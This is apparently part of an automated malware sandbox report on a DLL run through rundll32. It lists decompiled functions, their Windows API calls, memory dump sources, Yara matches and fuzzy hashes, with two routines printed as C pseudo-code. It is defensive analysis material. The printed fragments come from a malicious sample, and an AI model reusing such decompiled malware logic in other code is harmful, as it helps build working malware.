                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: a82b9576519fc084f8ae44d784602ae09a704e9f92da25272933a15d4cef7d02
                            • Instruction ID: 0dfe7531b2296bc31ec428be42f1398e52f50d59a3bbf4c774f6996ffc136145
                            • Opcode Fuzzy Hash: a82b9576519fc084f8ae44d784602ae09a704e9f92da25272933a15d4cef7d02
                            • Instruction Fuzzy Hash: 95514E76D00519EFDB00DFA8C588AAEB7B9EF88700B144598E915FB224D731AD41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F82E7D Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?), ref: 04F82E89
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • ResetEvent.KERNEL32(?,?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6), ref: 04F82F00
                            • GetLastError.KERNEL32(?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?), ref: 04F82F2D
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • GetLastError.KERNEL32(?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?), ref: 04F82FEF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                            • String ID:
                            • API String ID: 943265810-0
                            • Opcode ID: 512470257f0d222de0e0de9a9d4f238de2c2e4d0fe13b3fc6ee4ce090076d12f
                            • Instruction ID: 36e6b2e5bc95cbd7781e937908342d24599d943ca0518d5c9a5e7dfafe3c49ac
                            • Opcode Fuzzy Hash: 512470257f0d222de0e0de9a9d4f238de2c2e4d0fe13b3fc6ee4ce090076d12f
                            • Instruction Fuzzy Hash: 6F4163B2600208BFE721AFA4DC89EBB7BACEB44305B01496DF502D9191E774F945DA60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74DA9 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F74E5C
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F74E72
                            • memset.NTDLL ref: 04F74F1B
                            • memset.NTDLL ref: 04F74F31
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: e507e43b9f597b635d1178dbab01abbbb548c1b66c33fd0f28e5cdaa91afde32
                            • Instruction ID: 4aec6eae4dd103ff353cdaa05fa01b1452a0df53f5ce964384d580c6d63b78a1
                            • Opcode Fuzzy Hash: e507e43b9f597b635d1178dbab01abbbb548c1b66c33fd0f28e5cdaa91afde32
                            • Instruction Fuzzy Hash: 41418431A00219AFEF109F68DC80FEE7769EF45724F00856AF91AA7280DB74BD56CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11DE3 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E04A11DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04A12FAB(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04A11CC1(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04A12920(_t101,  &_v428, _a8, _t96 - _t81);
					E04A12920(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04A11CC1(_t101, 0x4a1a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04A11CC1(_a16, _a4);
						E04A13ADA(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04A1824A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04A18244();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04A1241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04A12378(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04A179CC(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4a1a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                            0x04a11de6
                            0x04a11df2
                            0x04a11df8
                            0x04a11dfd
                            0x04a11e01
                            0x04a11f73
                            0x04a11f77
                            0x04a11f77
                            0x04a11e07
                            0x04a11e0b
                            0x04a11e0f
                            0x04a11e12
                            0x04a11e1d
                            0x04a11e23
                            0x04a11e28
                            0x04a11e2b
                            0x04a11e45
                            0x04a11e54
                            0x04a11e60
                            0x04a11e6a
                            0x04a11e6f
                            0x04a11e71
                            0x04a11e74
                            0x04a11f2b
                            0x04a11f31
                            0x04a11f42
                            0x04a11f55
                            0x04a11f6b
                            0x00000000
                            0x04a11f70
                            0x04a11e7d
                            0x04a11e84
                            0x04a11e88
                            0x04a11e8e
                            0x04a11e90
                            0x04a11e92
                            0x04a11e94
                            0x04a11e96
                            0x04a11ea0
                            0x04a11ea5
                            0x04a11ea7
                            0x04a11ea9
                            0x04a11eaa
                            0x04a11eab
                            0x04a11eac
                            0x04a11eb3
                            0x04a11eba
                            0x04a11ebd
                            0x04a11ebd
                            0x04a11e8a
                            0x04a11e8a
                            0x04a11e8a
                            0x04a11ec5
                            0x04a11ecd
                            0x04a11ed9
                            0x04a11ede
                            0x04a11ede
                            0x04a11ee3
                            0x00000000
                            0x00000000
                            0x04a11ee5
                            0x04a11ee8
                            0x04a11ef5
                            0x00000000
                            0x00000000
                            0x04a11ef7
                            0x04a11ef7
                            0x04a11f04
                            0x04a11ede
                            0x04a11ee3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a11ee3
                            0x04a11f0e
                            0x04a11f11
                            0x04a11f14
                            0x04a11f1b
                            0x04a11f1b
                            0x04a11f28
                            0x00000000
                            0x04a11f28
                            0x04a11e14
                            0x04a11e18
                            0x04a11e19
                            0x04a11e1b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a11e1b
                            0x00000000

                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04A11E96
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04A11EAC
                            • memset.NTDLL ref: 04A11F55
                            • memset.NTDLL ref: 04A11F6B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 6da5233a4f275b729688821f66cff686bcf0c648f28868573a9d9b76671d156b
                            • Instruction ID: f15798c4e67541694092e055a5aef461b2f1f0bbffd5896c7e4a71109105ffab
                            • Opcode Fuzzy Hash: 6da5233a4f275b729688821f66cff686bcf0c648f28868573a9d9b76671d156b
                            • Instruction Fuzzy Hash: 5341D532A00219AFEF10DFA8DD84BEE7775EF49314F004569F919A72A0DB70BE558B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6F5ED Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            APIs
                            • ResetEvent.KERNEL32(?,00000000,00000000,00000000,04F63EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7C7D5
                            • GetLastError.KERNEL32(?,?,?,04F63EC6,?,?), ref: 04F7C7EE
                            • ResetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7C867
                            • GetLastError.KERNEL32(?,?,?,04F63EC6,?,?), ref: 04F7C882
                              • Part of subcall function 04F7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7EC20
                              • Part of subcall function 04F7EC09: SetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7EC30
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$ErrorLastReset$ObjectSingleWait
                            • String ID:
                            • API String ID: 1123145548-0
                            • Opcode ID: dcb48f95a2f6cb646f4389273c49eacfc862bcb8fa572b4c72f22cefa62917f2
                            • Instruction ID: 3f569fda857804f56899e923de8e89da87228204041ec2b70e0514e395448afc
                            • Opcode Fuzzy Hash: dcb48f95a2f6cb646f4389273c49eacfc862bcb8fa572b4c72f22cefa62917f2
                            • Instruction Fuzzy Hash: 14410932E00644EBEB119FA4DC44EAE77B9EF88364F14056AE512E7150E778F942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F79A79 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 04F79A93
                            • StrChrA.SHLWAPI(?,0000005C), ref: 04F79ABA
                            • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 04F79AE0
                            • lstrcpy.KERNEL32(?,?), ref: 04F79B84
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrcpyn
                            • String ID:
                            • API String ID: 4154805583-0
                            • Opcode ID: 8b5338ded040d32555ffacf82377bdd31516b62534c069c26114eefaa644d0ad
                            • Instruction ID: a2bcd64a15cb7a5e0dd12bb0e8c49dcfb643cfeeb29a8828838c436a3fe9cbb5
                            • Opcode Fuzzy Hash: 8b5338ded040d32555ffacf82377bdd31516b62534c069c26114eefaa644d0ad
                            • Instruction Fuzzy Hash: 40414DB6900119BFEB11DFA8DC84DEE7BBCEF09354F0445A6E911E7140D678AB45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F79185 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strupr
                            • String ID:
                            • API String ID: 3408778250-0
                            • Opcode ID: 8f989e1e448b755ad7998d526c5dab087664e967362942fcd92101bac0a4f528
                            • Instruction ID: 0e739d6eb040d263cee84fb2a8a29177c9f28c76bfe0dfe34747d20473056dde
                            • Opcode Fuzzy Hash: 8f989e1e448b755ad7998d526c5dab087664e967362942fcd92101bac0a4f528
                            • Instruction Fuzzy Hash: C8412FB28002099EEF21EF68D884EFE77E9EF45344F10441AE925DA120E7B8F556CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F64858 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 04F69D54
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F648C0
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F64911
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 04F64946
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 04F64956
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                            • String ID:
                            • API String ID: 4200334623-0
                            • Opcode ID: 91e0f28f41263ed4a2172ddb8b9d8ff4d88a47c740e934d981135eb7c8e82e0d
                            • Instruction ID: 351db4ddaabefa6d9412b078293686d00ef55c4cd7cf6ed7f91de8fe8f4b715e
                            • Opcode Fuzzy Hash: 91e0f28f41263ed4a2172ddb8b9d8ff4d88a47c740e934d981135eb7c8e82e0d
                            • Instruction Fuzzy Hash: A931EAB6900019BFDB10DFA4DC88CBEBBBDEB09254B110069F605EB110D775AE55DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7EC09 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7EC20
                            • SetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7EC30
                            • GetLastError.KERNEL32 ref: 04F7ECB9
                              • Part of subcall function 04F7F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,04F82F4B,0000EA60,?,?,?,04F7DD27,00000000,0000EA60,00000000), ref: 04F7F1B2
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • GetLastError.KERNEL32(00000000), ref: 04F7ECEE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 602384898-0
                            • Opcode ID: b14c4f8d3802358e136caeadb4413fad0aa7423dc4389673a7d64d0af556627a
                            • Instruction ID: c0eed435c6bc745bc99ec5ee62a36500b8e335ddd2edcb8e7c6e7a33ffe1e6fb
                            • Opcode Fuzzy Hash: b14c4f8d3802358e136caeadb4413fad0aa7423dc4389673a7d64d0af556627a
                            • Instruction Fuzzy Hash: 8531F0B5D00309FFDB20DFA5DC849AEBBB8EF04305F1489ABE502A6250D779AA45DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7A868 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F7A8C1
                            • memcpy.NTDLL(00000018,?,?), ref: 04F7A8EA
                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 04F7A929
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7A93C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2780211928-0
                            • Opcode ID: 0589fc348d7244653d8f8748a53a9393e2cb049b13b4e99501d8654e5ec9c87a
                            • Instruction ID: e92e8b28ec63818f426ebd464984fb95d1ffa8a1bbb3de52060a6ac07a0bdaad
                            • Opcode Fuzzy Hash: 0589fc348d7244653d8f8748a53a9393e2cb049b13b4e99501d8654e5ec9c87a
                            • Instruction Fuzzy Hash: 2F318570A00609AFDB108F64EC44EAB7BB8FF05724F01411EF955DA290D774ED15DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74B99 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • TlsGetValue.KERNEL32(?), ref: 04F74BC8
                            • SetEvent.KERNEL32(?), ref: 04F74C12
                            • TlsSetValue.KERNEL32(00000001), ref: 04F74C4C
                            • TlsSetValue.KERNEL32(00000000), ref: 04F74C68
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$Event
                            • String ID:
                            • API String ID: 3803239005-0
                            • Opcode ID: 95ee874287374726b9cd745c1317acd808fcacc7e9e2dcd440d51940b9dad6c1
                            • Instruction ID: 027b75c3a52e5ef801185474f71de6a5a53a32da434e5c73042b70ac8eb8be3a
                            • Opcode Fuzzy Hash: 95ee874287374726b9cd745c1317acd808fcacc7e9e2dcd440d51940b9dad6c1
                            • Instruction Fuzzy Hash: 8621B031A00648AFDF229F68ED859AA7FA2FF41B10B10462EF412CA160D379FC52DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7F09D Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,04F63EC6), ref: 04F75540
                              • Part of subcall function 04F7550A: memset.NTDLL ref: 04F755B6
                              • Part of subcall function 04F7550A: memset.NTDLL ref: 04F755CA
                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 04F7F0F5
                            • lstrcmpi.KERNEL32(00000000,?), ref: 04F7F11C
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F7F161
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04F7F172
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                            • String ID:
                            • API String ID: 1065503980-0
                            • Opcode ID: 43fd47834852c02edee115633bf721c38cff6a01c41d328525a888594e78b549
                            • Instruction ID: 16e7654d95f06010d80c94488d33d4eb4ddabbb8256b9256d7deffe7a2f498c1
                            • Opcode Fuzzy Hash: 43fd47834852c02edee115633bf721c38cff6a01c41d328525a888594e78b549
                            • Instruction Fuzzy Hash: D6215171A00109FFEF11AF64EC44EAE7BB9EF04358F10402AF915EA110D778AD5ADB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E0C4 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7E0F3
                            • lstrlen.KERNEL32(00000000), ref: 04F7E104
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • strcpy.NTDLL ref: 04F7E11B
                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04F7E125
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                            • String ID:
                            • API String ID: 528014985-0
                            • Opcode ID: 66d3c99e4c32151dd6645cf260601cb6551085ed0e1a3822acf548a505e16d1a
                            • Instruction ID: 07aea1bb0efd843ddd5ecb8db9095fc5bf9df7118cff6cc19f420178428fdf7e
                            • Opcode Fuzzy Hash: 66d3c99e4c32151dd6645cf260601cb6551085ed0e1a3822acf548a505e16d1a
                            • Instruction Fuzzy Hash: 0321A1B6500305AFE7105F24EC4AB3A77E8EF44755F00845FF8568B281EBF9E816C621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1264F Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E04A1264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04A16D63(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                            0x04a1265b
                            0x04a1265f
                            0x04a12660
                            0x04a12661
                            0x04a12663
                            0x04a12665
                            0x04a12668
                            0x04a1266d
                            0x04a12704
                            0x04a1270b
                            0x04a1270b
                            0x04a12676
                            0x04a1267d
                            0x04a1268d
                            0x04a1268d
                            0x04a12693
                            0x04a12695
                            0x04a1269a
                            0x04a126a3
                            0x04a126a9
                            0x04a126ae
                            0x04a126b9
                            0x04a126bd
                            0x04a126bf
                            0x04a126c0
                            0x04a126c9
                            0x04a126cd
                            0x04a126de
                            0x04a126cf
                            0x04a126d4
                            0x04a126d9
                            0x04a126e8
                            0x04a126e8
                            0x04a126bd
                            0x04a126ee
                            0x04a126f4
                            0x04a126f4
                            0x04a126fd
                            0x04a12702
                            0x04a12702
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
                            • API String ID: 1198164300-0
                            • Opcode ID: efa94c887583c71a92c185403d0e9654d9c582063a3c06e2ce602ccf9a079de0
                            • Instruction ID: d2f77ca7ec80a92bbb6b69f0d0e559d3130919ad48d105e7efc530acea6f746f
                            • Opcode Fuzzy Hash: efa94c887583c71a92c185403d0e9654d9c582063a3c06e2ce602ccf9a079de0
                            • Instruction Fuzzy Hash: 112174B6900209EFDB11DFA4C994ADEBBF8FF48304B1041A9E805E7260EB30EA05CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F62F91 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F62FB3
                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 04F62FF7
                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 04F6303A
                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04F6305D
                              • Part of subcall function 04F7B9E9: GetTickCount.KERNEL32 ref: 04F7B9F9
                              • Part of subcall function 04F7B9E9: CreateFileW.KERNEL32(04F70971,80000000,00000003,04F8A1E8,00000003,00000000,00000000,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA16
                              • Part of subcall function 04F7B9E9: GetFileSize.KERNEL32(04F70971,00000000,?,00000001,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA49
                              • Part of subcall function 04F7B9E9: CreateFileMappingA.KERNEL32(04F70971,04F8A1E8,00000002,00000000,00000000,04F70971), ref: 04F7BA5D
                              • Part of subcall function 04F7B9E9: lstrlen.KERNEL32(04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA79
                              • Part of subcall function 04F7B9E9: lstrcpy.KERNEL32(?,04F70971), ref: 04F7BA89
